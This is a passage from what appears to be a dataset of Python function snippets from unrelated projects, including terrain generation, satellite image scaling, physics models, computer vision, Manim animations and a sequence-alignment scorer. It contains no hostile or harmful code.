self[D]) / 4) + RAND(M)\n self[M] = normalize(add_z, M)\n\n # N = (K + A + J + F)/4 + RAND(d)\n # O = (L + A + G + J)/4 + RAND(d)\n # P = (J + G + K + E)/4 + RAND(d)\n # Q = (F + J + E + L)/4 + RAND(d)\n\n # N\n add_z = ((self[K] + self[A] + self[J] + self[F]) / 4) + RAND(N)\n self[N] = normalize(add_z, N)\n\n # O\n add_z = ((self[L] + self[A] + self[G] + self[J]) / 4) + RAND(O)\n self[O] = normalize(add_z, O)\n\n # P\n add_z = ((self[J] + self[G] + self[K] + self[E]) / 4) + RAND(P)\n self[P] = normalize(add_z, P)\n\n # Q\n add_z = ((self[F] + self[J] + self[E] + self[L]) / 4) + RAND(Q)\n self[Q] = normalize(add_z, Q)\n\n # N = (A + J + F)/3 + RAND(d)\n # O = (A + G + J)/3 + RAND(d)\n\n # N\n add_z = ((self[A] + self[J] + self[F]) / 3) + RAND(N)\n self[N] = normalize(add_z, N)\n\n # O\n add_z = ((self[A] + self[G] + self[J]) / 3) + RAND(N)\n self[O] = normalize(add_z, O)\n\n\n ### Start recurse for diamond alg\n square_diamond(A[0], A[1], dsize, strong)\n square_diamond(G[0], G[1], dsize, strong)\n square_diamond(F[0], F[1], dsize, strong)\n square_diamond(E[0], E[1], dsize, strong)\n\n # align\n def align_it(start, strong):\n \"\"\"Deprecated\n \"\"\"\n water = 0\n #map3d = self.copy()\n size = (abs(start)*2) + self.size - strong\n start = start + strong\n coords_map = []\n for x in xrange(start,size):\n for y in xrange(start,size):\n coords_map.append( (x, y) )\n\n random.shuffle(coords_map)\n\n lens = strong * (3.0 ** 2)\n for coord in coords_map:\n average = 0.0\n x, y = coord\n #rounds = self.get_round_xy_land(coord, -strong, False)\n #for r_coord in rounds:\n #average += self[r_coord]\n for x in xrange(-strong, strong+1):\n for y in xrange(-strong, strong+1):\n average += self[x, y]\n\n height = int(round(average / lens))\n #height = int(round(average / float(len(rounds))))\n if self[coord] <= water and height > water:\n height = water\n elif self[coord] > water and height <= water:\n height = water + 1\n\n #print self[coord], '->', height\n\n self[coord] = height\n\n if self.config.add_pre_heights:\n print 'Add heights start'\n add_heights()\n print 'Diamond-Square start'\n for x in xrange(1):\n square_diamond(\n sx = 0,\n sy = 0,\n size = self.size, strong=100)", "def reScaleLandsat(self,img):\n \n\t\tthermalBand = ee.List(['thermal'])\n\t\tthermal = ee.Image(img).select(thermalBand).multiply(10)\n \n\t\totherBands = ee.Image(img).bandNames().removeAll(thermalBand)\n\t\tscaled = ee.Image(img).select(otherBands).divide(0.0001)\n \n\t\timage = ee.Image(scaled.addBands(thermal)).int16()\n \n\t\treturn image.copyProperties(img)", "def phosphorene_4band():\n a = 0.222\n ax = 0.438\n ay = 0.332\n theta = 96.79 * (pi / 180)\n phi = 103.69 * (pi / 180)\n\n lat = pb.Lattice(a1=[ax, 0], a2=[0, ay])\n\n h = a * sin(phi - pi / 2)\n s = 0.5 * ax - a * cos(theta / 2)\n lat.add_sublattices(\n ('A', [-s/2, -ay/2, h], 0),\n ('B', [ s/2, -ay/2, 0], 0),\n ('C', [-s/2 + ax/2, 0, 0], 0),\n ('D', [ s/2 + ax/2, 0, h], 0)\n )\n\n lat.register_hopping_energies({\n 't1': -1.22,\n 't2': 3.665,\n 't3': -0.205,\n 't4': -0.105,\n 't5': -0.055\n })\n\n lat.add_hoppings(\n # t1\n ([-1, 0], 'A', 'D', 't1'),\n ([-1, -1], 'A', 'D', 't1'),\n ([ 0, 0], 'B', 'C', 't1'),\n ([ 0, -1], 'B', 'C', 't1'),\n # t2\n ([ 0, 0], 'A', 'B', 't2'),\n ([ 0, 0], 'C', 'D', 't2'),\n # t3\n ([ 0, 0], 'A', 'D', 't3'),\n ([ 0, -1], 'A', 'D', 't3'),\n ([ 1, 1], 'C', 'B', 't3'),\n ([ 1, 0], 'C', 'B', 't3'),\n # t4\n ([ 0, 0], 'A', 'C', 't4'),\n ([ 0, -1], 'A', 'C', 't4'),\n ([-1, 0], 'A', 'C', 't4'),\n ([-1, -1], 'A', 'C', 't4'),\n ([ 0, 0], 'B', 'D', 't4'),\n ([ 0, -1], 'B', 'D', 't4'),\n ([-1, 0], 'B', 'D', 't4'),\n ([-1, -1], 'B', 'D', 't4'),\n # t5\n ([-1, 0], 'A', 'B', 't5'),\n ([-1, 0], 'C', 'D', 't5')\n )\n\n return lat", "def bndy_plasma(self):\n self.ne[0], self.ne[-1] = 1e11, 1e11\n self.ni[0], self.ni[-1] = 1e11, 1e11\n self.nn[0], self.nn[-1] = 1e11, 1e11\n self.Te[0], self.Te[-1] = 0.1, 0.1\n self.Ti[0], self.Ti[-1] = 0.01, 0.01\n # self.coll_em[0], self.coll_em[-1] = 1e5, 1e5\n # self.coll_im[0], self.coll_im[-1] = 1e5, 1e5", "def roof_mwfrs(lenght, width, overhang=1, wall_height=3, roof_height=4):\n h = wall_height + 0.5*roof_height\n area = (lenght + overhang) * (width + overhang)\n area_1 = 0.5*h*width\n area_2 = 0.5*h*width\n area_3 = h*width\n area_4 = area - area_1 -area_2 - area_3\n return area, area_1, area_2, area_3, area_4", "def interpolate_matrix(matrix):", "def AgeCrushPad(self):\n\n\n for i in range(2): # Iterate over both types of crush pads\n for j in range(8, -1, -1): # Go through each slot in reverse order\n\n # If the slot if not currently full, move the previous grade up by one.\n # We must check if it is full to ensure that they stop at the max grade.\n if not self.Crush[i][j] and j > 0:\n self.Crush[i][j] = self.Crush[i][j - 1]\n self.Crush[i][j - 1] = False", "def reshape(self,bottom,top):\n pass", "def approx_forearms(shoulder_pts, biceps_pts, thresh, dst):\n forearm_R = None; forearm_L = None\n\n #############\n # RIGHT ARM # FIXME: This is actually the left arm\n #############\n r_start = biceps_pts[1]\n try:\n ''' Given the equation of a line, y = mx + b, we can find the inclination like so:\n\n -> Slope: m = (y2 - y1) / (x2 - x1)\n -> Angle: theta = tan^-1(slope)\n '''\n r_shoulder = shoulder_pts[1]\n r_slope = (r_start[1] - r_shoulder[1]) / (r_start[0] - r_shoulder[0])\n r_incl = np.arctan(r_slope)\n except TypeError:\n r_incl = 0\n if 1 > abs(r_incl) > 0.01:\n for i in range(210, -90, -1):\n sin = np.sin(i * np.pi / 180); cos = np.cos(i * np.pi / 180)\n try:\n r_end = (int(r_start[0] + (sin * 128)), int(r_start[1] + (cos * 128)))\n except TypeError:\n continue\n try:\n if thresh[r_end[1], r_end[0]] == 255:\n cv2.circle(img=dst, center=r_end, radius=3, color=(0, 0, 255), thickness=8)\n forearm_R = r_end\n break\n except IndexError:\n continue\n else:\n for i in range(0, 180):\n sin = np.sin(i * np.pi / 180); cos = np.cos(i * np.pi / 180)\n try:\n r_end = (int(r_start[0] + (sin * 128)), int(r_start[1] + (cos * 128)))\n except TypeError:\n continue\n try:\n if thresh[r_end[1], r_end[0]] == 255:\n cv2.circle(img=dst, center=r_end, radius=3, color=(0, 0, 255), thickness=8)\n forearm_R = r_end\n break\n except IndexError:\n continue\n ############\n # LEFT ARM #\n ############\n l_start = biceps_pts[0]\n try:\n l_shoulder = shoulder_pts[0]\n l_slope = (l_start[1] - l_shoulder[1]) / (l_start[0] - l_shoulder[0])\n l_incl = np.arctan(l_slope)\n except TypeError:\n l_incl = 0\n if 1 > abs(l_incl) > 0.01:\n for i in range(210, 90, -1):\n sin = np.sin(i * np.pi / 180); cos = np.cos(i * np.pi / 180)\n try:\n l_end = (int(l_start[0] + (sin * 128)), int(l_start[1] + (cos * 128)))\n except TypeError:\n continue\n try:\n if thresh[l_end[1], l_end[0]] == 255:\n cv2.circle(img=dst, center=l_end, radius=3, color=(0, 0, 255), thickness=8)\n forearm_L = l_end\n break\n except IndexError:\n continue\n else:\n for i in range(360, 180, -1):\n sin = np.sin(i * np.pi / 180); cos = np.cos(i * np.pi / 180)\n try:\n l_end = (int(l_start[0] + (sin * 128)), int(l_start[1] + (cos * 128)))\n except TypeError:\n continue\n try:\n if thresh[l_end[1], l_end[0]] == 255:\n cv2.circle(img=dst, center=l_end, radius=3, color=(0, 0, 255), thickness=8)\n forearm_L = l_end\n break\n except IndexError:\n continue\n return forearm_L, forearm_R", "def one_transition_spectrum_gauss(self,tr):\n \n \n fa = tr[\"fa\"] # Frequency axis\n HWHH = tr[\"HWHH\"] # Half width at the half hight (maximum)\n dd = tr[\"dd\"] # transition dipole strength\n rr = tr[\"rr\"] # transition dipole strength\n ld = tr[\"ld\"] # linear dichroism strength\n om = tr[\"om\"]+self.rwa # frequency\n \n # LineShape = lambda p, x: (x/(p[1]*np.sqrt(2*m.pi))*np.exp(-0.5*((x-p[0])/p[1])**2))\n # broad = broad/np.sqrt(2*np.log(2))\n sigma = HWHH/numpy.sqrt(2*numpy.log(2))\n \n # x = ta.data\n \n data = (fa.data/(sigma*numpy.sqrt(2*numpy.pi))*numpy.exp(-0.5*((fa.data-om)/sigma)**2))\n data_abs = dd*data\n data_CD = rr*data\n data_LD = ld*data\n \n return data_abs,data_CD, data_LD", "def _propagate_R(self):\n self.R_pad = np.pad(self.R, [(self.P, 0), (0, 0)], 'constant')\n M_R = np.lib.stride_tricks.as_strided(self.R_pad,\n shape=[self.L_h, self.L_h, self.P+1],\n strides=[self.R_pad.strides[0], self.R_pad.strides[1], self.R_pad.strides[0]])\n\n self.half_pie_var = np.dot(M_R, self.rev_A)\n self.half_pie_var_pad = np.pad(self.half_pie_var, [(0, 0), (self.P, 0)], 'constant')\n self.M_half_pie_var_pad = np.lib.stride_tricks.as_strided(self.half_pie_var_pad,\n shape=[self.L_h, self.P+1],\n strides=[self.half_pie_var_pad.strides[0]+self.half_pie_var_pad.strides[1], self.half_pie_var_pad.strides[1]])\n\n self.pie_var = np.dot(self.M_half_pie_var_pad, self.rev_A)", "def make_bwfull(w,minZ,maxZ,ires=1,fixw=False,m=mz0):\n cmds = []\n # coefficients for the amplitudes\n cmds.append(\"A[1,0,1000000]\")\n cmds.append(\"B[1,0,1000000]\")\n cmds.append(\"C[10000.0,0,1000000]\")\n # amplitudes\n cmds.append('m[%s,%s,%s]'%(m,minZ,maxZ))\n cmds.append('g[2.49,0,10]')\n denom = '((x^2-m^2)^2+x^4*g^2/m^2)'\n cmds.append(\"expr::z_rbw('x^2/%s',x,m,g)\"%denom)\n cmds.append(\"expr::z_int('(x^2-m^2)/%s',x,m,g)\"%denom)\n cmds.append(\"expr::z_rad('1/(x^2)',x)\")\n # resolution model\n cmds += resolutions[ires]()\n [w.factory(cmd) for cmd in cmds]\n # any parameter adjustments\n if True:\n w.var('r_m').setConstant(kTRUE) if w.var('r_m') else None\n w.var('rt_m').setConstant(kTRUE) if w.var('rt_m') else None\n w.var('g').setConstant(kTRUE) if w.var('g') and fixw else None\n # sum-of-amplitudes pdf\n lshape = RooRealSumPdf('lshape','lshape',RooArgList(w.function('z_rad'),w.function('z_int'),w.function('z_rbw')),RooArgList(w.var('A'),w.var('B'),w.var('C')))\n getattr(w,'import')(lshape)\n # convolution\n pdf = w.pdf('lshape')\n if w.pdf('res'):\n w.var('x').setBins(10000,'cache')\n cmd = 'FCONV::sum(x,lshape,res)'\n w.factory(cmd)\n pdf = w.pdf('sum')\n return pdf, kFALSE", "def F_trans(self):\n rho_H1 = self.edp_par['rho_H1'].value\n Z_H1 = self.edp_par['Z_H1'].value\n sigma_H1 = self.edp_par['sigma_H1'].value\n rho_H2 = self.edp_par['rho_H2'].value\n Z_H2 = self.edp_par['Z_H2'].value\n sigma_H2 = self.edp_par['sigma_H2'].value\n rho_M = self.edp_par['rho_M'].value\n sigma_M = self.edp_par['sigma_M'].value\n psi = self.edp_par['psi'].value \n common_scale = self.edp_par['common_scale'].value\n \n \n # Make sure Z_H2 > Z_H1. If Z_H2 < Z_H1, swap them\n if Z_H1 > Z_H2:\n Z_H1, Z_H2 = Z_H2, Z_H1\n sigma_H1, sigma_H2 = sigma_H2, sigma_H1\n rho_H1, rho_H2 = rho_H2, rho_H1\n \n # Calculate the intermediate variables\n alpha = self.qz*cos(psi) - self.qx*sin(psi)\n Z_CH2 = Z_H1 - sigma_H1\n Z_W = Z_H2 + sigma_H2\n DeltaZ_H = Z_W - Z_CH2\n \n # Calculate the Gaussian part \n FG = -rho_M*sigma_M * exp(-0.5*(alpha*sigma_M)**2)\n FG += 2*rho_H1*sigma_H1 * cos(alpha*Z_H1) * exp(-0.5*(alpha*sigma_H1)**2)\n FG += 2*rho_H2*sigma_H2 * cos(alpha*Z_H2) * exp(-0.5*(alpha*sigma_H2)**2)\n FG *= np.sqrt(2*pi)\n \n # Calculate the strip part\n FS = -2 * sin(alpha*Z_CH2) / alpha\n \n # Calculate the bridging part\n FB = 1 / (alpha + pi/DeltaZ_H)\n FB += 1 / (alpha - pi/DeltaZ_H)\n FB *= sin(alpha*Z_W) + sin(alpha*Z_CH2)\n FB *= 0.5\n FB -= (sin(alpha*Z_W)-sin(alpha*Z_CH2)) / alpha\n \n return common_scale * (FG + FS + FB)", "def F_trans(self):\n rho_H1 = self.edp_par['rho_H1'].value\n Z_H1 = self.edp_par['Z_H1'].value\n sigma_H1 = self.edp_par['sigma_H1'].value\n rho_M = self.edp_par['rho_M'].value\n sigma_M = self.edp_par['sigma_M'].value\n psi = self.edp_par['psi'].value \n common_scale = self.edp_par['common_scale'].value\n \n # Calculate the intermediate variables\n alpha = self.qz*cos(psi) - self.qx*sin(psi)\n Z_CH2 = Z_H1 - sigma_H1\n Z_W = Z_H1 + sigma_H1\n DeltaZ_H = Z_W - Z_CH2\n \n # Calculate the Gaussian part \n FG = -rho_M*sigma_M * exp(-0.5*(alpha*sigma_M)**2)\n FG += 2*rho_H1*sigma_H1 * cos(alpha*Z_H1) * exp(-0.5*(alpha*sigma_H1)**2)\n FG *= np.sqrt(2*pi)\n \n # Calculate the strip part\n FS = -2 * sin(alpha*Z_CH2) / alpha\n \n # Calculate the bridging part\n FB = 1 / (alpha + pi/DeltaZ_H)\n FB += 1 / (alpha - pi/DeltaZ_H)\n FB *= sin(alpha*Z_W) + sin(alpha*Z_CH2)\n FB *= 0.5\n FB -= (sin(alpha*Z_W)-sin(alpha*Z_CH2)) / alpha\n \n return common_scale * (FG + FS + FB)", "def calculate(crushes):\n\n def to_stress(force):\n pin_area = np.pi * (PIN_DIAM / 2) ** 2\n return force / pin_area\n\n def to_strain(delta, length):\n delta, length = abs(delta), abs(length)\n return delta / length # compressive positive\n\n for i, num in enumerate(crushes.index):\n crush = crushes.loc[num, 'Data']\n\n # Tissue thickness\n thickness = abs(contact_position(crush))\n crushes.loc[num, 'Thickness (mm)'] = thickness\n\n # Crush duration\n crushes.loc[num, 'Crush Duration (s)'] = crush_duration(crush)\n\n # Target duration\n delta = target_duration(crush)\n crushes.loc[num, 'Target Duration (s)'] = delta\n\n # Target stress\n target_stress = crush.loc[target_time(crush), 'Stress (MPa)']\n crushes.loc[num, 'Target Stress (MPa)'] = target_stress\n\n # Target strain\n target_strain = crush.loc[target_time(crush), 'Strain']\n crushes.loc[num, 'Target Strain'] = target_strain\n\n # Stiffness at contact\n # Assumed to be minimum\n stiffness = crush['Stiffness (MPa)'].min()\n crushes.loc[num, 'Contact Stiffness (MPa)'] = stiffness\n\n # Stiffness at target\n # Assumed to be maximum\n stiffness = crush['Stiffness (MPa)'].max()\n crushes.loc[num, 'Target Stiffness (MPa)'] = stiffness\n\n # Delta stress after target reached\n stress_relaxation = to_stress(target_relaxation(crush))\n crushes.loc[num, 'Relaxation Stress (MPa)'] = stress_relaxation\n\n # Delta strain after target reached\n holding_strain = to_strain(target_movement(crush), thickness)\n crushes.loc[num, 'Holding Strain'] = holding_strain\n\n return crushes", "def make_bispectra(self, bgwindow=4):\n\n bisp = lambda d, ij, jk, ki: d[:,ij] * d[:,jk] * n.conj(d[:,ki]) # bispectrum for pol data\n# bisp = lambda d, ij, jk, ki: n.complex(d[ij] * d[jk] * n.conj(d[ki])) # without pol axis\n\n triples = self.make_triples()\n meanbl = self.data.mean(axis=2).mean(axis=0) # find bls with no zeros in either pol to ignore in triples\n self.triples = triples[n.all(meanbl[triples][:,0] != 0j, axis=1) & n.all(meanbl[triples][:,1] != 0j, axis=1) & n.all(meanbl[triples][:,2] != 0j, axis=1)] # only take triples if both pols are good. may be smaller than set for an individual pol\n\n # set up arrays for bispectrum and for weighting data (ignoring zeros)\n bispectra = n.zeros((len(self.dmarr), len(self.data), len(self.triples)), dtype='complex')\n truearr = n.ones( (self.npol, self.nbl, len(self.chans)))\n falsearr = n.zeros( (self.npol, self.nbl, len(self.chans)))\n\n # iterate over dm trials and integrations\n for d in xrange(len(self.dmarr)):\n twidth = n.round(self.twidths[d])\n dmwidth = int(n.round(n.max(self.dmtrack0[d][0]) - n.min(self.dmtrack0[d][0])))\n\n for i in xrange((bgwindow/2)+twidth, len(self.data)-( (bgwindow/2)+2*twidth+dmwidth )): # dmwidth avoided at end, others are split on front and back side of time iteration\n# for i in xrange((bgwindow/2)+twidth, len(self.data)-( (bgwindow/2)+twidth+dmwidth ), max(1,twidth/2)): # can step by twidth/2, but messes up data products\n diff = self.tracksub(d, i, bgwindow=bgwindow)\n\n if len(n.shape(diff)) == 1: # no track\n continue\n\n# **need to redo for self.flags**\n weightarr = n.where(diff != 0j, truearr, falsearr) # ignore zeros in mean across channels # bit of a hack\n try:\n diffmean = n.average(diff, axis=2, weights=weightarr)\n except ZeroDivisionError:\n diffmean = n.mean(diff, axis=2) # if all zeros, just make mean # bit of a hack\n\n for trip in xrange(len(self.triples)):\n ij, jk, ki = self.triples[trip]\n bispectra[d, i, trip] = bisp(diffmean, ij, jk, ki).mean(axis=0) # Stokes I bispectrum. Note we are averaging after forming bispectrum, so not technically a Stokes I bispectrum.\n print 'dedispersed for ', self.dmarr[d]\n self.bispectra = n.ma.masked_array(bispectra, bispectra == 0j)", "def stretch(points, stretches=[1, 1]):\n x = stretches[0] * points[0]\n y = stretches[1] * points[1]\n return [x, y]", "def scaleLandsat(self,img):\n\t\tthermal = img.select(ee.List(['thermal'])).multiply(0.1)\n\t\tscaled = ee.Image(img).select(self.env.divideBands).multiply(ee.Number(0.0001))\n\t\t\n\t\treturn img.select([]).addBands(scaled).addBands(thermal)", "def __create_base_shap_img(self):\n\n self.img = 255 * np.ones([1680, 1680, 3], dtype=np.uint8)\n self.baseline_scale_img = cv2.imread(self.scale_img_dict[\"baseline_scale\"])\n self.baseline_scale_top_left = (100, 800)\n baseline_scale_bottom_right = (\n self.baseline_scale_top_left[0] + self.baseline_scale_img.shape[0],\n self.baseline_scale_top_left[1] + self.baseline_scale_img.shape[1],\n )\n baseline_scale_middle = ((int(700 + self.baseline_scale_img.shape[1] / 2)), 85)\n self.img[\n self.baseline_scale_top_left[0] : baseline_scale_bottom_right[0],\n self.baseline_scale_top_left[1] : baseline_scale_bottom_right[1],\n ] = self.baseline_scale_img\n cv2.putText(\n self.img,\n \"BASELINE SHAP\",\n baseline_scale_middle,\n cv2.FONT_HERSHEY_COMPLEX,\n 1,\n (0, 0, 0),\n 2,\n )\n\n self.small_arrow_img = cv2.imread(self.scale_img_dict[\"small_arrow\"])\n small_arrow_top_left = (\n baseline_scale_bottom_right[0],\n int(\n self.baseline_scale_top_left[1]\n + (self.baseline_scale_img.shape[1] / 100) * (self.shap_baseline_value)\n ),\n )\n small_arrow_bottom_right = (\n small_arrow_top_left[0] + self.small_arrow_img.shape[0],\n small_arrow_top_left[1] + self.small_arrow_img.shape[1],\n )\n self.img[\n small_arrow_top_left[0] : small_arrow_bottom_right[0],\n small_arrow_top_left[1] : small_arrow_bottom_right[1],\n ] = self.small_arrow_img\n\n self.color_bar_img = cv2.imread(self.scale_img_dict[\"color_bar\"])\n\n side_scale_img = cv2.imread(self.scale_img_dict[\"side_scale\"])\n side_scale_top_left = (\n small_arrow_bottom_right[0] + 50,\n self.baseline_scale_top_left[1] - 50,\n )\n self.side_scale_y_tick_cords = [\n (side_scale_top_left[0], side_scale_top_left[1] - 75)\n ]\n for i in range(1, 7):\n self.side_scale_y_tick_cords.append(\n (\n int(side_scale_top_left[0] + (side_scale_img.shape[0] / 4) * i),\n int(side_scale_top_left[1] - 75),\n )\n )\n self.arrow_start = (\n int(small_arrow_top_left[1] + (self.small_arrow_img.shape[1] / 2)),\n side_scale_top_left[0],\n )\n\n for img_cnt, (img_name, img_data) in enumerate(self.category_img_dict.items()):\n icon_img = cv2.resize(\n cv2.imread(img_data[\"icon\"]),\n None,\n fx=1.5,\n fy=1.5,\n interpolation=cv2.INTER_CUBIC,\n )\n icon_top_left = (\n self.side_scale_y_tick_cords[img_cnt][0] - int(icon_img.shape[0] / 2),\n self.side_scale_y_tick_cords[img_cnt][1] - 100,\n )\n icon_bottom_right = (\n icon_top_left[0] + icon_img.shape[0],\n self.side_scale_y_tick_cords[img_cnt][1] + icon_img.shape[1] - 100,\n )\n text_location = (\n int(\n icon_bottom_right[0]\n - (icon_bottom_right[0] - icon_top_left[0])\n + 100\n ),\n int(icon_bottom_right[1] - (icon_bottom_right[1] - icon_top_left[1]))\n - 380,\n )\n cv2.putText(\n self.img,\n str(img_name),\n (text_location[1], text_location[0]),\n cv2.FONT_HERSHEY_COMPLEX,\n 0.75,\n (0, 0, 0),\n 1,\n )\n self.img[\n icon_top_left[0] : icon_bottom_right[0],\n icon_top_left[1] : icon_bottom_right[1],\n ] = icon_img", "def reshape(self, bottom, top):\r\n pass", "def gain_standardization(self):\r\n \"\"\"\r\n load all gain factors from any hm stage (gains are identical for all SHM stages)\r\n \"\"\"\r\n gain_factors = []\r\n for i in range(self.number_of_paths):\r\n value = self.data_of_hm_cycle['coupon']['path_data'][0][0][0][i][4][0][0]\r\n gain_factors.append(value)\r\n gain_factors = np.array(gain_factors)\r\n gains_factor_new_dim = gain_factors[np.newaxis, ...]\r\n matrix_gains_2d = np.repeat(gains_factor_new_dim, self.signal_length, axis=0).T\r\n matrix_of_gains = matrix_gains_2d[:, :, np.newaxis]\r\n\r\n \"\"\"\r\n divide all signals by the gain factors such that all gains are standardized to one\r\n \"\"\"\r\n for i in range(self.num_of_hm_stages):\r\n entries = i*self.number_of_paths\r\n hm_cycle_set = self.sensor_data_flattened_[entries : entries + self.number_of_paths]\r\n divided_data = np.divide(hm_cycle_set, matrix_of_gains)\r\n self.sensor_data_flattened_[entries : entries + self.number_of_paths] = divided_data\r\n self.sensor_data_original_shape_[i, :, :, :] = divided_data\r\n\r\n return", "def createEntrances(self):\n\t\tfor x in range(self.width):\n\t\t\tif self.isFloor(x, 1):\n\t\t\t\tself.setFloor(x, 0)\n\t\t\t\tbreak\n\t\tfor x in range(self.width - 1, 0, -1):\n\t\t\tif self.isFloor(x, self.height - 2):\n\t\t\t\tself.setFloor(x, self.height - 1)\n\t\t\t\tbreak", "def weight4width(box_width,platformWidth,stairsLength,stepCount,stepWidth):\n if (platformWidth-stairsLength)<0:\n platformWidth = stairsLength + 50 #platform width must larger than stairs length ,the value is 50\n return platformWidth\n else:return platformWidth", "def explainAreaSmall(self):\n \n #EXPLANATION NO. 1\n #fadeout the non-required areas\n self.play(FadeOut(area_ABC_copy), FadeOut(area_ABD_copy),\n FadeOut(geq_2), FadeOut(geq_1),\n FadeOut(area_ABC), FadeOut(area_ABD))\n \n #expand the required area\n self.play(area_ABE_copy.animate.scale(2).move_to(RIGHT*2))\n\n #surrounding text\n abe_text_1 = always_redraw(\n lambda : MathTex(\"=\", \"\\\\text{Area of } \\\\triangle ABE\").scale(0.8).next_to(area_ABE_copy, RIGHT)\n )\n\n #half base height\n abe_text_2 = always_redraw(\n lambda : MathTex(\"=\", \"\\\\dfrac{1}{2}\", \"\\\\times\", \"\\\\text{base}\", \"\\\\times\", \"\\\\text{height}\").scale(0.8).next_to(area_ABE_copy, RIGHT)\n )\n\n #write texts\n self.play(Write(abe_text_1))\n self.wait()\n self.play(ReplacementTransform(abe_text_1[0], abe_text_2[0]),\n ReplacementTransform(abe_text_1[1:], abe_text_2[1:]))\n self.wait()\n\n #defining braces\n abe_base_brace = always_redraw(\n lambda : Brace(radius_ang, DOWN)\n )\n abe_base_brace_label = always_redraw(\n lambda : MathTex(\"R\\\\cos\\\\theta\").scale(0.6).next_to(abe_base_brace, DOWN)\n )\n abe_height_brace = always_redraw(\n lambda : Brace(radius_ang, LEFT)\n )\n abe_height_brace_label = always_redraw(\n lambda : MathTex(\"R\\\\sin\\\\theta\").scale(0.6).next_to(abe_height_brace, LEFT)\n )\n\n self.play(Write(abe_base_brace), Write(abe_height_brace))\n self.play(Write(abe_base_brace_label), Write(abe_height_brace_label))\n self.wait()\n\n \n #back to editing the equation\n abe_text_3 = always_redraw(\n lambda : MathTex(\"=\", \"\\\\dfrac{1}{2}\", \"\\\\times\", \"R\\\\cos\\\\theta\", \"\\\\times\", \"R\\\\sin\\\\theta\").scale(0.8).next_to(area_ABE_copy, RIGHT)\n )\n\n self.play(ReplacementTransform(abe_text_2[0:], abe_text_3[0:]))\n self.wait(0.5)\n self.play(FadeOut(abe_base_brace), FadeOut(abe_height_brace),\n FadeOut(abe_base_brace_label), FadeOut(abe_height_brace_label))\n \n abe_text_4 = always_redraw(\n lambda : MathTex(\"=\", \"\\\\dfrac{1}{2}\", \"\\\\times\", \"\\\\cos x\", \"\\\\times\", \"\\\\sin x\").scale(0.8).next_to(area_ABE_copy, RIGHT)\n )\n self.play(ReplacementTransform(abe_text_3[0:], abe_text_4[0:]))\n\n abe_text_5 = always_redraw(\n lambda : MathTex(\"=\", \"\\\\dfrac{1}{2}\", \"\\\\sin x\", \"\\\\cos x\").scale(0.8).next_to(area_ABE_copy, RIGHT)\n )\n self.play(ReplacementTransform(abe_text_4[0:2], abe_text_5[0:2]),\n ReplacementTransform(abe_text_4[2:], abe_text_5[2:]))\n\n #vgroup for drawing box\n abe_group = VGroup(abe_text_5, area_ABE_copy)\n abe_formula_box = SurroundingRectangle(abe_group, color=PINK)\n\n self.play(Write(abe_formula_box))\n self.wait()\n\n #remove all elements\n self.play(FadeOut(abe_formula_box), FadeOut(abe_text_5), FadeOut(area_ABE_copy), FadeOut(area_ABE))", "def __bcc_top_diagonals(self) -> cq.cq.Workplane:\n # In a cuboid ABCDA1B1C1D1 this is the angle C1AD\n #angle_C1AD = 90 - degrees(acos(2**-.5))\n angle_C1AD = 90 - degrees(acos(0.5))\n angle_CAD = 90 - degrees(acos(sqrt(2/3)))\n pseudo_unit_cell_size = sqrt(2/3)*self.unit_cell_size\n corner_points = np.array(\n [(0, 0),\n (self.bcc_unit_cell_size, 0),\n (self.bcc_unit_cell_size, self.unit_cell_size),\n (0, self.unit_cell_size)]\n )\n result = (\n cq.Workplane(\"XY\")\n .pushPoints(corner_points)\n .eachpointAdaptive(\n create_bcc_diagonal_strut,\n callback_extra_args = [\n {\"unit_cell_size\": 0.5 * pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": - angle_CAD,\n \"angle_y\": angle_C1AD},\n {\"unit_cell_size\": pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": - angle_CAD,\n \"angle_y\": - angle_C1AD},\n {\"unit_cell_size\": pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": angle_CAD,\n \"angle_y\": - angle_C1AD},\n {\"unit_cell_size\": 0.5 * pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": angle_CAD,\n \"angle_y\": angle_C1AD}\n ],\n useLocalCoords = True\n )\n )\n return result", "def smith_waterman_fill(self):\r\n\r\n matrix = self.empty_matrix() # Building on the previous definition\r\n\r\n def score_cell(i,j):\r\n \"\"\"\r\n This scoreing definition will return the score of\r\n a position (i, j) based on the left, upper, and upper left values.\r\n Your scoring function should:\r\n * Choose the maximum of the following 4 values for the score\r\n * the value of (i-1, j) + insertion/deletion penalty\r\n * the value of (i, j-1) + insertion/deletion penalty\r\n * If the characters at i-1 and j-1 in s1 and s2 respectively match:\r\n the value of (i-1, j-1) + match score\r\n else\r\n the value of (i-1, j-1) + mismatch penalty\r\n * 0 (if all other numbers are negative, use 0)\r\n :param i: integer, the outer list index\r\n :param j: integer, the inner list index\r\n :return: integer\r\n \"\"\"\r\n match = 3\r\n mismatch = -3\r\n ins_del = -2\r\n \r\n up = matrix[i-1][j]+ ins_del\r\n left = matrix[i][j-1]+ ins_del\r\n \r\n if self.s1[i-1] == self.s2[j-1]:\r\n diag = matrix[i-1][j-1] + match\r\n else:\r\n diag = matrix[i-1][j-1] + mismatch\r\n \r\n return max(up, left, diag)\r\n \r\n for i in range(1,len(self.s1)+1):\r\n for j in range(1,len(self.s2)+1):\r\n matrix[i][j] =score_cell(i,j)\r\n \r\n return matrix", "def test_banded_to_full():\n A_diag = np.diag([11, 22, 33, 44, 55])\n A_diag_band = np.array([[11, 22, 33, 44, 55]])\n A = banded_to_full(A_diag_band, 5, 0, 0, 'g')\n assert norm(A - A_diag) == 0\n A = banded_to_full(A_diag_band, 5, 0, 0, 't')\n assert norm(A - A_diag) == 0\n A = banded_to_full(A_diag_band, 5, 0, 0, 'h')\n assert norm(A - A_diag) == 0\n A = banded_to_full(A_diag_band, 5, 0, 0, 's')\n assert norm(A - A_diag) == 0\n\n A_gen = np.array(\n [\n [11, 12, 13, 0, 0],\n [21, 22, 23, 24, 0],\n [0, 32, 33, 34, 35],\n [0, 0, 43, 44, 45],\n [0, 0, 0, 54, 55],\n ]\n )\n A_gen_band = np.array(\n [\n [0, 0, 13, 24, 35],\n [0, 12, 23, 34, 45],\n [11, 22, 33, 44, 55],\n [21, 32, 43, 54, 0],\n ]\n )\n A = banded_to_full(A_gen_band, 5, kl=1, ku=2, mode='g')\n assert norm(A - A_gen) == 0\n\n A_sym = np.array(\n [\n [11, 12, 13, 0, 0],\n [12, 22, 23, 24, 0],\n [13, 23, 33, 34, 